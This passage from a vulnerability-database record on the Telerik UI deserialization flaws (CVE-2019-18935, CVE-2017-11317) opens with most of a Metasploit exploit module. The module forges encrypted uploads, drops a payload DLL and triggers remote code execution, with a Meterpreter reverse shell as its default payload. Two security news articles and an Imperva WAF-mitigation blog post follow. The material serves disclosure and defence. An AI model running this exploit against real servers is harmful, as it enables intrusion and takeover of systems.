'2020.3.915').\n },\n 'Author' => [\n 'Spencer McIntyre', # Metasploit module\n 'Paul Taylor', # (@bao7uo) Python PoCs\n 'Markus Wulftange', # (@mwulftange) discovery of CVE-2019-18935\n 'Caleb Gross', # (@noperator) research on CVE-2019-18935\n 'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2017-11317\n 'Oleksandr Mirosh', # (@olekmirosh) discover of CVE-2017-11317\n 'straightblast', # (@straight_blast) discovery of CVE-2017-11317\n ],\n 'License' => MSF_LICENSE,\n 'References' => CVE_2017_11317_REFERENCES + CVE_2019_18935_REFERENCES,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Targets' => [['Windows', {}],],\n 'Payload' => { 'Space' => 2048 },\n 'DefaultOptions' => {\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2019-12-09', # Telerik article on CVE-2019-18935\n 'Notes' => {\n 'Reliability' => [UNRELIABLE_SESSION],\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\n },\n 'Privileged' => true\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),\n OptString.new('FILE_NAME', [ false, 'The base file name for the upload (default will be random)' ]),\n OptString.new('DESTINATION', [ true, 'The destination folder for the upload', 'C:\\\\Windows\\\\Temp' ]),\n OptString.new('RAU_ENCRYPTION_KEY', [ true, 'The encryption key for the RAU configuration data', DEFAULT_RAU_ENCRYPTION_KEY ]),\n OptString.new('RAU_SIGNING_KEY', [ true, 'The signing key for the RAU configuration data', DEFAULT_RAU_SIGNING_KEY ]),\n OptString.new('VERSION', [ false, 'The Telerik UI ASP.NET AJAX version' ])\n ])\n end\n\n def dest_file_basename\n @dest_file_name = @dest_file_name || datastore['FILE_NAME'] || \"#{Rex::Text.rand_text_alphanumeric(rand(4..35))}.dll\"\n end\n\n def check\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 
'vars_get' => { 'type' => 'rau' }\n })\n return CheckCode::Safe unless res&.code == 200\n return CheckCode::Safe unless res.get_json_document&.dig('message') =~ /RadAsyncUpload handler is registered succesfully/\n\n if datastore['VERSION'].blank?\n @version = enumerate_version\n else\n begin\n upload_file('', datastore['VERSION'])\n rescue Msf::Exploit::Failed\n return CheckCode::Safe\n end\n\n @version = datastore['VERSION']\n end\n\n if !@version.nil? && datastore['RAU_SIGNING_KEY'] == DEFAULT_RAU_SIGNING_KEY && datastore['RAU_ENCRYPTION_KEY'] == DEFAULT_RAU_ENCRYPTION_KEY\n print_status('Server is using default crypto keys and is vulnerable to CVE-2017-11317')\n report_vuln({\n host: rhost,\n port: rport,\n proto: 'tcp',\n name: 'Unrestricted File Upload via Weak Encryption',\n refs: CVE_2017_11317_REFERENCES.map { |ctx_id, ctx_val| SiteReference.new(ctx_id, ctx_val) }\n })\n end\n\n # with custom errors enabled (which is the default), it's not possible to test for the serialization flaw without triggering it\n CheckCode::Detected\n end\n\n def exploit\n fail_with(Failure::BadConfig, 'No version was specified and it could not be enumerated') if @version.nil?\n upload_file(generate_payload_dll({ mixed_mode: true }), @version)\n execute_payload\n end\n\n def execute_payload\n print_status('Executing the payload...')\n serialized_object = { 'Path' => \"#{datastore['DESTINATION'].chomp('\\\\').gsub('\\\\', '/')}/#{dest_file_basename}.tmp\" }\n serialized_object_type = Msf::Util::DotNetDeserialization::Assemblies::VERSIONS['4.0.0.0']['System.Configuration.Install']['System.Configuration.Install.AssemblyInstaller']\n\n msg = rau_mime_payload(serialized_object, serialized_object_type.to_s)\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' },\n 'method' => 'POST',\n 'data' => msg.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{msg.bound}\"\n }, 5\n )\n # this request to 
execute the payload times out on success and returns 200 when it fails, for example because the\n # AllowedCustomMetaDataTypes setting is blocking the necessary code path\n fail_with(Failure::UnexpectedReply, 'Failed to execute the payload') if res&.code == 200\n end\n\n def upload_file(file_contents, version)\n target_folder = encrypt('')\n temp_target_folder = encrypt(datastore['DESTINATION'].encode('UTF-16LE'))\n if (version =~ /(\\d{4})\\.\\d+.\\d+/) && Regexp.last_match(1).to_i > 2016\n # signing is only necessary for versions >= 2017.1.118 (versions that don't match the regex don't require signing)\n target_folder << sign(target_folder)\n temp_target_folder << sign(temp_target_folder)\n end\n\n serialized_object = {\n 'TargetFolder' => target_folder,\n 'TempTargetFolder' => temp_target_folder,\n 'MaxFileSize' => 0,\n 'TimeToLive' => {\n 'Ticks' => 1440000000000,\n 'Days' => 0,\n 'Hours' => 40,\n 'Minutes' => 0,\n 'Seconds' => 0,\n 'Milliseconds' => 0,\n 'TotalDays' => 1.6666666666666665,\n 'TotalHours' => 40,\n 'TotalMinutes' => 2400,\n 'TotalSeconds' => 144000,\n 'TotalMilliseconds' => 144000000\n },\n 'UseApplicationPoolImpersonation' => false\n }\n serialized_object_type = \"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=#{version}, Culture=neutral, PublicKeyToken=121fae78165ba3d4\"\n\n msg = rau_mime_payload(serialized_object, serialized_object_type, file_contents: file_contents)\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'),\n 'vars_get' => { 'type' => 'rau' },\n 'method' => 'POST',\n 'data' => msg.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{msg.bound}\"\n }\n )\n fail_with(Failure::UnexpectedReply, 'The upload failed') unless res&.code == 200\n metadata = JSON.parse(decrypt(res.get_json_document['metaData']).force_encoding('UTF-16LE'))\n dest_path = \"#{datastore['DESTINATION'].chomp('\\\\')}\\\\#{metadata['TempFileName']}\"\n print_good(\"Uploaded 
#{file_contents.length} bytes to: #{dest_path}\")\n register_file_for_cleanup(dest_path)\n end\n\n def rau_mime_payload(serialized_object, serialized_object_type, file_contents: '')\n metadata = { 'TotalChunks' => 1, 'ChunkIndex' => 0, 'TotalFileSize' => 1, 'UploadID' => dest_file_basename }\n\n post_data = Rex::MIME::Message.new\n post_data.add_part(\"#{encrypt(serialized_object.to_json.encode('UTF-16LE'))}&#{encrypt(serialized_object_type.encode('UTF-16LE'))}\", nil, nil, 'form-data; name=\"rauPostData\"')\n post_data.add_part(file_contents, 'application/octet-stream', 'binary', \"form-data; name=\\\"file\\\"; filename=\\\"#{dest_file_basename}\\\"\")\n post_data.add_part(dest_file_basename, nil, nil, 'form-data; name=\"fileName\"')\n post_data.add_part('application/octet-stream', nil, nil, 'form-data; name=\"contentType\"')\n post_data.add_part('1970-01-01T00:00:00.000Z', nil, nil, 'form-data; name=\"lastModifiedDate\"')\n post_data.add_part(metadata.to_json, nil, nil, 'form-data; name=\"metadata\"')\n post_data\n end\n\n def enumerate_version\n print_status('Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect')\n File.open(File.join(Msf::Config.data_directory, 'wordlists', 'telerik_ui_asp_net_ajax_versions.txt'), 'rb').each_line do |version|\n version.strip!\n next if version.start_with?('#')\n\n vprint_status(\"Checking version: #{version}\")\n begin\n upload_file('', version)\n rescue Msf::Exploit::Failed\n next\n end\n\n print_good(\"The Telerik UI ASP.NET AJAX version has been identified as: #{version}\")\n return version\n end\n\n nil\n end\n\n #\n # Crypto Functions\n #\n def get_cipher(mode)\n # older versions might need to use pbkdf1\n blob = OpenSSL::PKCS5.pbkdf2_hmac_sha1(datastore['RAU_ENCRYPTION_KEY'], SALT, 1000, 48)\n cipher = OpenSSL::Cipher.new('AES-256-CBC').send(mode)\n cipher.key = blob.slice(0, 32)\n cipher.iv = blob.slice(32, 48)\n cipher\n end\n\n def decrypt(cipher_text)\n cipher = 
get_cipher(:decrypt)\n cipher.update(Rex::Text.decode_base64(cipher_text)) + cipher.final\n end\n\n def encrypt(plain_text)\n cipher = get_cipher(:encrypt)\n cipher_text = ''\n cipher_text << cipher.update(plain_text) unless plain_text.empty?\n cipher_text << cipher.final\n Rex::Text.encode_base64(cipher_text)\n end\n\n def sign(data)\n Rex::Text.encode_base64(OpenSSL::HMAC.digest('SHA256', datastore['RAU_SIGNING_KEY'], data))\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/telerik_rau_deserialization.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:17", "description": "[](<https://thehackernews.com/images/-aPh3AyK7bqc/YQfQByUmHnI/AAAAAAAADaU/NmwrUQl8ZRcRsgL1Y2FPj8U64wKdrMlLACLcBGAsYHQ/s0/apt-hacker.jpg>)\n\nA new highly capable and persistent threat actor has been targeting major high-profile public and private entities in the U.S. as part of a series of targeted cyber intrusion attacks by exploiting internet-facing Microsoft Internet Information Services ([IIS](<https://en.wikipedia.org/wiki/Internet_Information_Services>)) servers to infiltrate their networks.\n\nIsraeli cybersecurity firm Sygnia, which identified the campaign, is tracking the advanced, stealthy adversary under the moniker \"Praying Mantis\" or \"TG2021.\"\n\n\"TG1021 uses a custom-made malware framework, built around a common core, tailor-made for IIS servers. The toolset is completely volatile, reflectively loaded into an affected machine's memory and leaves little-to-no trace on infected targets,\" the researchers [said](<https://www.sygnia.co/praying-mantis-targeted-apt>). 
\"The threat actor also uses an additional stealthy backdoor and several post-exploitations modules to perform network reconnaissance, elevate privileges, and move laterally within networks.\" \n\n[](<https://thehackernews.com/images/-ZP-P4VwOZxI/YQfQWTuCuiI/AAAAAAAADac/u-zO1cQst2UuJ9lV7I9J_dj369CMBpmhgCLcBGAsYHQ/s0/hacker-attack.jpg>)\n\nBesides exhibiting capabilities that show a significant effort to avoid detection by actively interfering with logging mechanisms and successfully evading commercial endpoint detection and response (EDR) systems, the threat actor has been known to leverage an arsenal of ASP.NET web application exploits to gain an initial foothold and backdoor the servers by executing a sophisticated implant named \"NodeIISWeb\" that's designed to load custom DLLs as well as intercept and handle HTTP requests received by the server.\n\n[](<https://thehackernews.com/images/-50djfDO2Prg/YQfQlpOifCI/AAAAAAAADag/Zr7kLjdvhak0dndsJENUEv_mJYyfng4hwCLcBGAsYHQ/s0/hacking-news.jpg>)\n\nThe vulnerabilities that are taken advantage of by the actor include:\n\n * Checkbox Survey RCE Exploit ([CVE-2021-27852](<https://nvd.nist.gov/vuln/detail/CVE-2021-27852>))\n * VIEWSTATE Deserialization Exploit\n * Altserialization Insecure Deserialization\n * Telerik-UI Exploit ([CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) and [CVE-2017-11317](<https://nvd.nist.gov/vuln/detail/CVE-2017-11317>))\n\nInterestingly, Sygnia's investigation into TG1021's tactics, techniques, and procedures (TTPs) have unearthed \"major overlaps\" to those of a nation-sponsored actor named \"[Copy-Paste Compromises](<https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf>),\" as detailed in an advisory released by the Australian Cyber Security Centre (ACSC) in June 2020, which described a cyber campaign targeting public-facing infrastructure primarily through the use of unpatched flaws in Telerik UI and IIS servers. 
However, a formal attribution is yet to be made.\n\n\"Praying Mantis, which has been observed targeting high-profile public and private entities in two major Western markets, exemplifies a growing trend of cyber criminals using sophisticated, nation-state attack methods to target commercial organizations,\" the researchers said. \"Continuous forensics activities and timely incident response are essential to identifying and effectively defending networks from attacks by similar threat actors.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-02T11:11:00", "type": "thn", "title": "New APT Hacking Group Targets Microsoft IIS Servers with ASP.NET Exploits", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935", "CVE-2021-27852"], "modified": "2022-02-23T04:34:16", "id": "THN:942BFBB34DF6A24E460572684F648005", "href": 
"https://thehackernews.com/2021/08/new-apt-hacking-group-targets-microsoft.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:17", "description": "[](<https://thehackernews.com/images/-_sUoUckANJU/YQJlBsicySI/AAAAAAAADX0/BEDLvJhwqzYImk1o5ewZhnKeXxnoL0D0wCLcBGAsYHQ/s0/Security-Vulnerabilities.jpg>)\n\nIntelligence agencies in Australia, the U.K., and the U.S. issued a joint advisory on Wednesday detailing the most exploited vulnerabilities in 2020 and 2021, once again demonstrating how threat actors are able to swiftly weaponize publicly disclosed flaws to their advantage.\n\n\"Cyber actors continue to exploit publicly known\u2014and often dated\u2014software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Centre (ACSC), the United Kingdom's National Cyber Security Centre (NCSC), and the U.S. 
Federal Bureau of Investigation (FBI) [noted](<https://us-cert.cisa.gov/ncas/alerts/aa21-209a>).\n\n\"However, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\"\n\nThe top 30 vulnerabilities span a wide range of software, including remote work, virtual private networks (VPNs), and cloud-based technologies, that cover a broad spectrum of products from Microsoft, VMware, Pulse Secure, Fortinet, Accellion, Citrix, F5 Big IP, Atlassian, and Drupal.\n\nThe most routinely exploited flaws in 2020 are as follows -\n\n * [**CVE-2019-19781**](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) (CVSS score: 9.8) - Citrix Application Delivery Controller (ADC) and Gateway directory traversal vulnerability\n * [**CVE-2019-11510**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) (CVSS score: 10.0) - Pulse Connect Secure arbitrary file reading vulnerability\n * [**CVE-2018-13379**](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) (CVSS score: 9.8) - Fortinet FortiOS path traversal vulnerability leading to system file leak\n * [**CVE-2020-5902**](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) (CVSS score: 9.8) - F5 BIG-IP remote code execution vulnerability\n * [**CVE-2020-15505**](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) (CVSS score: 9.8) - MobileIron Core & Connector remote code execution vulnerability\n * [**CVE-2020-0688**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>) (CVSS score: 8.8) - Microsoft Exchange memory corruption vulnerability\n * [**CVE-2019-3396**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>) (CVSS score: 9.8) - Atlassian Confluence Server remote code execution vulnerability\n * [**CVE-2017-11882**](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>) (CVSS score: 7.8) - Microsoft Office memory corruption vulnerability\n * [**CVE-2019-11580**](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>) (CVSS score: 
9.8) - Atlassian Crowd and Crowd Data Center remote code execution vulnerability\n * [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) - Drupal remote code execution vulnerability\n * [**CVE-2019-18935**](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>) (CVSS score: 9.8) - Telerik .NET deserialization vulnerability resulting in remote code execution\n * [**CVE-2019-0604**](<https://nvd.nist.gov/vuln/detail/CVE-2019-0604>) (CVSS score: 9.8) - Microsoft SharePoint remote code execution vulnerability\n * [**CVE-2020-0787**](<https://nvd.nist.gov/vuln/detail/CVE-2020-0787>) (CVSS score: 7.8) - Windows Background Intelligent Transfer Service (BITS) elevation of privilege vulnerability\n * [**CVE-2020-1472**](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) (CVSS score: 10.0) - Windows [Netlogon elevation of privilege](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) vulnerability\n\nThe list of vulnerabilities that have come under active attack thus far in 2021 are listed below -\n\n * [Microsoft Exchange Server](<https://thehackernews.com/2021/03/urgent-4-actively-exploited-0-day-flaws.html>): [CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>), [CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>), [CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>), and [CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>) (aka \"ProxyLogon\")\n * [Pulse Secure](<https://thehackernews.com/2021/05/new-high-severity-vulnerability.html>): [CVE-2021-22893](<https://nvd.nist.gov/vuln/detail/CVE-2021-22893>), [CVE-2021-22894](<https://nvd.nist.gov/vuln/detail/CVE-2021-22894>), [CVE-2021-22899](<https://nvd.nist.gov/vuln/detail/CVE-2021-22899>), and [CVE-2021-22900](<https://nvd.nist.gov/vuln/detail/CVE-2021-22900>)\n * [Accellion](<https://thehackernews.com/2021/03/extortion-gang-breaches-cybersecurity.html>): 
[CVE-2021-27101](<https://nvd.nist.gov/vuln/detail/CVE-2021-27101>), [CVE-2021-27102](<https://nvd.nist.gov/vuln/detail/CVE-2021-27102>), [CVE-2021-27103](<https://nvd.nist.gov/vuln/detail/CVE-2021-27103>), and [CVE-2021-27104](<https://nvd.nist.gov/vuln/detail/CVE-2021-27104>)\n * [VMware](<https://thehackernews.com/2021/06/alert-critical-rce-bug-in-vmware.html>): [CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n * Fortinet: [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>)\n\nThe development also comes a week after MITRE [published](<https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html>) a list of top 25 \"most dangerous\" software errors that could lead to serious vulnerabilities that could be exploited by an adversary to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.\n\n\"The advisory [...] puts the power in every organisation's hands to fix the most common vulnerabilities, such as unpatched VPN gateway devices,\" NCSC Director for Operations, Paul Chichester, [said](<https://www.ncsc.gov.uk/news/global-cyber-vulnerabilities-advice>), urging the need to prioritize patching to minimize the risk of being exploited by malicious actors.\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-29T08:21:00", "type": "thn", "title": "Top 30 Critical Security Vulnerabilities Most Exploited by Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-08-04T09:03:14", "id": "THN:B95DC27A89565323F0F8E6350D24D801", "href": "https://thehackernews.com/2021/07/top-30-critical-security.html", 
"cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2020-08-07T08:03:43", "description": "On June 18, 2020, the Australian Cyber Security Centre (ACSC) released a disclosure detailing a \u2018sophisticated\u2019 and sustained attack against Australian government bodies and companies. The disclosure was covered by several mainstream media outlets including the [BBC](<https://www.bbc.com/news/world-australia-46096768>), and the [Guardian](<https://www.theguardian.com/australia-news/2020/jun/19/australia-cyber-attack-attacks-hack-state-based-actor-says-australian-prime-minister-scott-morrison>).\n\nThe following day, the Australian prime minister made a [statement](<https://www.pm.gov.au/media/statement-malicious-cyber-activity-against-australian-networks>) about the attacks in which, although he declined to attribute the attacks to a specific threat actor, he suggested that it was \u2018state based\u2019. According to the BBC the prime minister also stressed that the attacks were not limited only to Australia, but affected targets worldwide.\n\nSeveral exploits and indicators of compromise were outlined in the ACSC\u2019s disclosure, including initial access vectors, execution techniques, malware, and persistence techniques. These were all evaluated by our analysts to ensure that, where possible, the Imperva Cloud WAF could mitigate attempts to utilise such vectors. Naturally, some of these items fall outside of the scope of what a WAF is expected to mitigate, such as spear phishing attacks. However, in many instances, the wide-ranging capabilities of Imperva Cloud WAF allows for effective mitigation of the exploits and techniques leveraged in the campaign. 
In this blog post, we\u2019ll explore some of these exploits and techniques and how Imperva Cloud WAF can mitigate against them.\n\n### The Access Vectors\n\nThe ACSC identified several initial access vectors during the campaign, all of which are detailed [here](<https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises.pdf>). Let\u2019s take a brief look at a few of these vectors, and the mitigation provided by the Imperva Cloud WAF.\n\n### Telerik UI CVE-2019-18935\n\nCVE-2019-18935 is a vulnerability discovered in 2019 by researchers at [Bishop Fox](<https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>), in the RadAsyncUpload file handler in Telerik UI for ASP.net AJAX, a commonly-used suite of web application UI components. The vulnerability is brought about by the [insecure deserialization](<https://www.imperva.com/blog/deserialization-attacks-surge-motivated-by-illegal-crypto-mining/>) of JSON objects, which can lead to remote code execution on the host.\n\nIn order to successfully exploit the insecure deserialization vulnerability identified in CVE-2019-18935, the attacker must also exploit a pre-existing file upload vulnerability, CVE-2017-11317, which identifies the use of a default encryption key to encrypt the data in file upload requests. With this knowledge, an attacker can use the key to modify the \u201cTempTargetFolder\u201d variable in the upload request, essentially allowing file uploads to anywhere in the file system the web server has write permissions to.\n\nThe more recent vulnerability, CVE-2019-18935, details the anatomy of the upload request from RadAsyncUpload, in which the rauPostData parameter contains both a serialized configuration object, and the object\u2019s type.\n\nShown below is the HTTP POST request containing the encrypted rauPostData parameter. 
The part of the parameter before the \u201c&\u201d, highlighted in blue is the serialized configuration object, and the part after, highlighted in yellow is the object's defined type.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/Telerik-Request.jpg>)\n\nWhen decrypted the configuration object resembles the following:\n \n \n {\n \"TargetFolder\":\"jgas0meSrU/uP/TPzrhDTw==Au0LOaX6ddHOqJL5T8IwoKpc0rwIVPUB/dtjhNpis+s=\",\n \"TempTargetFolder\":\"5wWbvXpnoGw9mTa6QfX46Myim0SoKqJw/9EHc5hWUV4=fkWs4vRRUA8PKwu+jP0J2GwFcymt637TiHk3kmHvRM4=\",\n \"MaxFileSize\":0,\n \"TimeToLive\":{\n \"Ticks\":1440000000000,\n \"Days\":0,\n \"Hours\":40,\n \"Minutes\":0,\n \"Seconds\":0,\n \"Milliseconds\":0,\n \"TotalDays\":1.6666666666666665,\n \"TotalHours\":40,\n \"TotalMinutes\":2400,\n \"TotalSeconds\":144000,\n \"TotalMilliseconds\":144000000\n },\n \"UseApplicationPoolImpersonation\":false\n }\n \n\nAnd the type resembles:\n\n` \nTelerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=2017.1.228, Culture=neutral, PublicKeyToken=121fae78165ba3d4 \n`\n\nIt was discovered that, if the attacker could modify the specified type to be a gadget - a class inside the scope of execution of the application - in a subsequent request, they could achieve remote code execution on the server.\n\nAnalysts at Imperva were able to take the proof of concept code provided, and reproduce the requests made. From here they were able to create cloud WAF rules to distinguish between legitimate traffic from the RadAsyncUpload file handler, and the malicious requests from the PoC code.\n\n**Statistics and observations:**\n\nThroughout June, we observed the attack pattern matching that of an exploit of CVE-2019-18935 on 645 occasions. 
The following chart shows the top targeted countries during that period.\n\n### Exploitation of Citrix Products CVE-2019-19781\n\nThe vulnerability in Citrix products CVE-2019-19781 was disclosed in a bulletin released by Citrix back in December 2019. Although no proof of concept or exploit was released at the time, it was said to potentially result in remote code execution and was presumed to take advantage of a directory traversal flaw in the application. We\u2019ve already released a blog post covering our mitigation of this vulnerability [here](<https://www.imperva.com/blog/imperva-mitigates-exploits-of-citrix-vulnerability-right-out-of-the-box/>).\n\n**Statistics and observations:**\n\nDuring the month of June we\u2019ve seen the rule put in place for this vulnerability by Imperva Cloud WAF triggered 155,050 times. The following chart shows the top targeted countries during that period.\n\n### Persistence Techniques\n\nThe ACSC identified several different persistence techniques used during the campaign. Among these were several webshells which allowed the attacker to interact with the compromised systems after achieving initial access.\n\nA webshell is a script or piece of code which runs on a web server and allows for administrative actions to be performed remotely. Often these serve legitimate purposes, although uploading of webshells is common practice for attackers seeking to maintain persistence after initially compromising a server. These webshells are commonly referred to as backdoors.\n\n**Imperva\u2019s backdoor protection**\n\nBackdoor protection, which forms a part of the Imperva Cloud WAF, is capable of both detection and mitigation of webshells uploaded to compromised servers to act as backdoors. 
When certain conditions are met, the Cloud WAF proxies inspect the response from the server, from which they can identify known webshells, and block the subsequent requests thereafter.\n\nYou can read more about Imperva\u2019s backdoor protection [here](<https://www.imperva.com/blog/the-trickster-hackers-backdoor-obfuscation-and-evasion-techniques/>)\n\n**Webshells observed in the campaign**\n\nIn its disclosure, the ACSC provided a [list of webshells](<https://www.cyber.gov.au/sites/default/files/2020-06/ACSC-Advisory-2020-008-Copy-Paste-Compromises-Web-Shell-Source.txt>) observed during the attack campaign. In each instance, the source code for the webshell was provided, XOR\u2019d, and base64 encoded to prevent \u2018accidental mishandling\u2019 of the code. We\u2019ll look briefly at two of these webshells and outline how Imperva\u2019s Backdoor Protection effectively mitigates them. Shown below is the Awen webshell source code in its encoded form.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/image6.png>)\n\n### Awen asp.net webshell\n\nThis is a simple, open source asp.net webshell outlined by the ACSC in its disclosure. It creates a simple HTML form which receives a string as input, and provides it as an argument to cmdexe. Shown below is the Awen webshell running in our sandbox environment, after executing the \u201csysteminfo\u201d command.\n\n[](<https://www.imperva.com/blog/wp-content/uploads/sites/9/2020/07/image1-1.png>)\n\nAnalysts at Imperva were then able to decode the source code of both the webshells discussed, execute that code on a sandbox environment, and gather enough info to craft signatures to detect the webshells in the wild. 
Although neither of these webshells have been observed in the wild by Imperva at this time, we will be monitoring the traffic detected by these signatures closely in the coming weeks.\n\nFrom even a brief look at the details provided about the recent Australian Cyber attack, a lot can be learned about the techniques used by threat actors, and many conclusions can be drawn. Among the most significant is that even advanced \u201cstate based\u201d actors will make use of readily available exploits and attack code. Although the [mitigation recommendations from the ACSC](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-008-copy-paste-compromises-tactics-techniques-and-procedures-used-target-multiple-australian-networks>) are well advised, the use of a well configured WAF can serve as an extra layer of protection. This is where the deployment of the Imperva WAF could make all the difference to your business.\n\nThe post [Australian Cyber Attack Vectors Blocked Out of the Box by Imperva WAF](<https://www.imperva.com/blog/australian-cyber-attack-vectors-blocked-out-of-the-box-by-imperva-cloud-waf/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": 